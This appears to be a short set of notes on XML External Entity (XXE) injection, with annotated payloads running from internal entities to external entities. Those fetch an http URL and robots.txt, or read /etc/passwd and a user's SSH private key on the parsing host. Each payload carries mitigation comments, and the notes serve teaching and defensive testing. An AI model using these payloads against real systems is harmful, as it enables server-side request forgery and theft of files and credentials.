
XML External Entity (XXE)

variables

<?xml version="1.0"?>
<!-- Internal general entities: the replacement text is declared inline in the
     DTD, so expanding them reads nothing outside this document. -->
<!DOCTYPE root[
        <!ENTITY myName "Michal">
        <!ENTITY mySurname "Szalkowski">
        ]>
<root>
    <!-- After expansion the text node is "Michal Szalkowski". A parser that is
         configured to reject any DOCTYPE declaration refuses this document. -->
    <text>&myName; &mySurname;</text>
</root>

webContent

<?xml version="1.0"?>
<!-- External general entity whose system identifier is an http:// URL. A parser
     that resolves external entities fetches the URL from the host doing the
     parsing and substitutes the response for the reference, which makes the
     parser a server-side request (SSRF) primitive.
     Mitigation: disable DTD processing, or at least external entity resolution,
     in the parser; restricting outbound traffic from the parsing host limits
     what such a request can reach. -->
<!DOCTYPE root [ <!ENTITY webContent SYSTEM "http://log.michalszalkowski.com/lorem.txt">]>
<root>
    <!-- The ';' after the end tag is literal character data inside <root>; it is
         not part of the entity reference. -->
    <text>&webContent;</text>;
</root>

<?xml version="1.0"?>
<!-- External general entity with a relative system identifier. It is resolved
     against the base URI of this document, so what "robots.txt" refers to
     depends on how the document reached the parser (NOTE(review): the page does
     not state the base URI; confirm per target parser).
     Mitigation is the same as for any external entity: disable DTD processing
     or external entity resolution. -->
<!DOCTYPE root [<!ENTITY webContent SYSTEM "robots.txt">]>
<root>
    <!-- The ';' after the end tag is literal character data inside <root>; it is
         not part of the entity reference. -->
    <text>&webContent;</text>;
</root>

fileContent

<?xml version="1.0"?>
<!-- External general entity whose system identifier is a bare absolute path.
     A system identifier is a URI reference, so the path is resolved against the
     document's base URI; presumably this ends up as a local file read on the
     parsing host (behaviour for scheme-less paths varies by parser; confirm).
     The read happens with the privileges of the process that parses the XML.
     Mitigation: disable DTD processing or external entity resolution, and
     reject inbound documents that carry a DOCTYPE. -->
<!DOCTYPE root [<!ENTITY fileContent SYSTEM "/etc/passwd">]>
<root>&fileContent;</root>

<?xml version="1.0"?>
<!-- Same construct as the /etc/passwd document, aimed at a user's SSH private
     key. The path is specific to one host and account (falcon).
     Defensive reading: any secret readable by the account that runs the XML
     parser is exposed when external entities are resolved. Run the parser under
     a least-privilege account, and if this class of bug is confirmed on a
     system, rotate the keys that account could read. -->
<!DOCTYPE root [<!ENTITY fileContent SYSTEM "/home/falcon/.ssh/id_rsa">]>
<root>&fileContent;</root>
<?xml version="1.0"?>
<!-- External general entity with an explicit file:// URI, so the local-file
     target does not depend on base-URI resolution of a bare path.
     Mitigation: disable DTD processing or external entity resolution in the
     parser; where a DTD is genuinely required, install a resolver that denies
     the file scheme. -->
<!DOCTYPE root [<!ENTITY fileContent SYSTEM 'file:///etc/passwd'>]>
<root>
    <!-- If the entity is resolved, the file content becomes the text of <text>. -->
    <text>&fileContent;</text>
</root>